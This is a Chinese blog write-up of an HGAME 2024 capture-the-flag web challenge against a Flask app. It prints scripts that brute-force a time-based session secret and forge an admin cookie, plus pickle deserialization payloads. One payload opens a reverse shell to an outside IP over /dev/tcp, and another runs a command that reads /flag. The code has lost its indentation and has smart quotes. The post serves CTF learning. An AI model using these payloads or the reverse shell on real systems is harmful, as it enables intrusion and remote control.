HGAME 2024 WEEK2 Web方向题解 全_what the cow say ,原理讲解

最新推荐文章于 2024-06-10 21:57:03 发布
最新推荐文章于 2024-06-10 21:57:03 发布
阅读量917 收藏 19
点赞数 23
分类专栏: 2024年程序员学习 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61331491/article/details/137397496
版权

题目描述:善用搜索引擎,容器中的 Python 版本为 3.11

image-20240206233929260

直接给了源码:

import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone(‘Asia/Shanghai’))
currentTime = currentDateAndTime.strftime(“%H%M%S”)

app = Flask(name)

Tips: Try to crack this first ↓

app.config[‘SECRET_KEY’] = currentTime
print(currentTime)

@app.route(‘/’)
def index():
session[‘username’] = ‘guest’
return send_file(‘app.py’)

@app.route(‘/flag’, methods=[‘GET’, ‘POST’])
def flag():
if not session:
return ‘There is no session available in your client 😦’
if request.method == ‘GET’:
return ‘You are {} now’.format(session[‘username’])

For POST requests from admin

if session[‘username’] == ‘admin’:
pickle_data=base64.b64decode(request.form.get(‘pickle_data’))

Tips: Here try to trigger RCE

userdata=pickle.loads(pickle_data)
return userdata
else:
return ‘Access Denied’

if name==‘__main__’:
app.run(debug=True, host=“0.0.0.0”)

两个步骤。1、破解session;2、pickle实现RCE

session密钥是当前时间,在根路由刷新,/flag路由刷新网页不改变session。

image-20240206234444244

我当前时间戳(密钥)是234221。

image-20240206234455231

我们小范围爆破即可。230000->234221

当前session:

eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcJSFQ.1hGqXUp2ShF_fZMMfz2htjO7Kz4

脚本解密看看结构

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
payload, sig = payload.rsplit(b’.‘, 1)
payload, timestamp = payload.rsplit(b’.', 1)

decompress = False
if payload.startswith(b’.'):
payload = payload[1:]
decompress = True

try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of ’
‘an exception’)

if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before ’
‘decoding the payload’)

return session_json_serializer.loads(payload)

if name == ‘__main__’:
print(decryption(“eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcJSFQ.1hGqXUp2ShF_fZMMfz2htjO7Kz4”.encode())) #输入session

非常的朴实无华

image-20240206234832747

爆破密钥脚本:

import itertools
import flask_unsign
from flask_unsign.helpers import wordlist
import requests as r
import time
import re
import sys

path = “wordlist.txt”

print("Generating wordlist… ")

with open(path,“w”) as f:
#permutations with repetition
[f.write(‘23’+“”.join(x)+‘’+“\n”) for x in itertools.product(‘0123456789’, repeat=4)] #加上前缀

#url = “http://47.115.201.35:8000/index”
#cookie_tamper = r.head(url).cookies.get_dict()[‘session’]
cookie_tamper=‘eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcJSFQ.1hGqXUp2ShF_fZMMfz2htjO7Kz4’
print("Got cookie: " + cookie_tamper)

print(“Cracker Started…”)

obj = flask_unsign.Cracker(value=cookie_tamper)

before = time.time()

with wordlist(path, parse_lines=False) as iterator:
obj.crack(iterator)

secret = “”
if obj.secret:
secret =obj.secret.decode()
print(f"Found SECRET_KET {secret} in {time.time()-before} seconds")

signer = flask_unsign.sign({“time”:time.time(),“authorized”:True},secret=secret)

密钥233629

image-20240206235214865

之后flask_unsign工具伪造session即可。

flask-unsign --sign --cookie “{‘username’: ‘admin’}” --secret ‘233629’

image-20240207000052384

伪造成功,开始第二步。

image-20240207000125898

注意,pickle,版本要一致,版本是311。

脚本:

import pickle
import os
import base64

class aaa():
def __reduce__(self):
return(os.system,(‘bash -c “bash -i >& /dev/tcp/120.46.41.173/9023 0>&1”’,))

a= aaa()

payload=pickle.dumps(a)

payload=base64.b64encode(payload)
print(payload)

寄了,我就知道没这么简单。

image-20240207001514534

报错看不太出来什么。我之前生成pickle那个引用了os包,可能环境没有,换个脚本。

import pickle
import base64

class A(object):
def __reduce__(self):
return (eval, (“__import__(‘os’).popen(‘tac /flag’).read()”,))

a = A()
a = pickle.dumps(a)
print(base64.b64encode(a))

最低0.47元/天 解锁文章
莫莫Android开发
关注
  • 23
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
[CTF]Hgame2024-PWN部分wp
2301_79880752的博客
02-11 1995
签到题,直接nc得到flag。
HGAME 2024 WEEK2 WP
mumuzi的博客
02-15 1484
中),然后通过AES_ECB的方式对bytes进行加密,再把两组加密后的bytes恢复成图片,对恢复的两张图片进行异或操作之后,采用近邻法的方式缩小图片为(16,9)得到。在做完华容道之后的那天晚上,对着这道题先是发了一会的呆,一直把server里的check_pixels函数搞错了,我在想为什么xy又要等于黑色又不等于黑色。考虑AMM,当然我是不懂的,这里是靠搜搜到的(评论区)在第4天的下午,刷完一个两小时的沙雕动画之后,寻思来看会题,一下就解决了之前那个问题,也找到了解题的关键点。但是第一组是什么呢?
hgame2024——week1 reverse方向题解wp
2302_81769965的博客
02-15 817
看到flag字样,hgame{W3lc0me_T0_Th3_World_of_Rev3rse!大致明白是flag异或0x22得到c,根据异或的性质,c异或0x22得到flag。得到flag:hgame{ASM_Is_Imp0rt4nt_4_Rev3rs3}又是windows下的64位文件,但是注意到,有打包工具,也就是我们口中的“壳”ok,大概看到文件类型PE64,是windows下的64位文件。首先,下载附件,根据提示和题目名知道是python逆向,
【Hgame2024】#Week1 Crypto详细解+部分Web
jayq1的博客
02-06 1583
HGame2024Week1,题解记录,对密码有一定的分析推荐阅读,其他方向写的比较基础,师傅们可以参考其他优质题解,有问题欢迎交流!
HGAME 2024 WEEK 1 :web ezHTTP
weixin_74790320的博客
02-07 599
然后提示通过那些东西访问页面,User-Agent: 是构造你浏览器访问信息的,所以复制右边那一串替代就好了。这次主要查漏补缺了知识点伪造ip地址还有:X-Real-IP:这种方式。但是本题这里构造这两个都是没有反应的,就有第三种方式。然后要求我们从本地访问,那就是伪造ip。然后我们就可以得到右边有一长串的东西。我们把它base64解码一下看看。第一想法就是Referer伪造。然后构造伪造的Referer。看到这个就知道是文件头伪造。
HGAME cdcollector-开源
04-24
这是现有项目cdcollector的mod,用于为拥有过多数据库的人使用phpmysql存储您的HGAMES数据库。
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
单表替换密码算法破解工具
01-15
网络密码中介绍的基本加密方法,与凯撒密码相似,该软件提供基本的替换功能
HGAME 2024 WEEK 1(复现)
m0_73725283的博客
03-06 830
我们可以看到含有{的图片有5个,说明原图片上的字符正好是hgame{,只有这个与其他异或能够得到5个含{的图片,剩下的我们直接手动排序即可(含有{的图片可以不去看,里面包含的信息我们已知为hgame{,此外需要注意的是因为图片的异或,相同的相素点会消失)而nextbit的值是i的每一位进行异或的结果,即i上的mark有效位的值的异或(a^0=a,异或不分顺序,所以0的异或可以忽略不计)答案:hgame{G0od!答案:hgame{F3rmat_l1tt1e_the0rem_is_th3_bas1s}
Hgame题解(第二星期)
Bluetuan的博客
03-01 1095
打开靶机发现是一个登陆页面,根据题目提示下载弱密码字典,通过BP爆破获得用户密码为qwert123登陆后进入下一个页面,由于学分已满无法选课,所以需要先进行选课扩学分申请,进入该页面提示,需要爆破申请,与 Week 1 类似可以写python脚本进行申请,也可以使用BP的Intruder进行申请,这里采用BP在经过大量申请之后网站并不会返回其他值,但是再回到选课页面时会发现学分上限提高了,也就可以自主选课了,选课很简单,选完之后就可以拿到flag。
HGAME 2024 WEEK 1
Fab1an的博客
02-08 1178
nc 登录上去即可获得flag。
hgame2024-week1
247533的博客
02-13 795
今年的题目质量很高
HGAME 2024 WEEK1 Web方向题解
Jay17的博客
02-06 1356
HGAME 2024 WEEK1 Web方向题解
HGAME 2024 WEEK2 Web方向题解
Jay17的博客
02-14 1730
HGAME 2024 WEEK2 Web方向题解
HGAME 2024 WEEK1 WP
mumuzi的博客
02-06 1641
基于这一点,我想到如果我选中的图是第一张图或者最后一张图,那么用这张图片去异或其他图片,得到的信息是绝对递增的,不会出现信息个数相同的情况(即假设为flag{123}选中的为f,再往后异或会出现f^fl = l,f^fla = la……没找到问号,试了一下welcome不对,感觉是数字但是一下子没找到,去搜leet发现字母c没有对应的数字表示,就试了下hgame{welc0me。full还是1对吧,但是如果左边我故意让右边400几次,再发正常的包,多次重复这个步骤,莫名其妙full=0了。
JS中一个dom元素能绑定多少事件
最新发布
ggq53219的博客
06-10 529
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加了从指定文件夹获取图片的功能: ```python import os from PIL import Image def get_images_from_folder(folder_path): images = [] for filename in os.listdir(folder_path): if filename.endswith(".png"): image_path = os.path.join(folder_path, filename) image = Image.open(image_path) images.append(image) return images # 指定文件夹路径 folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值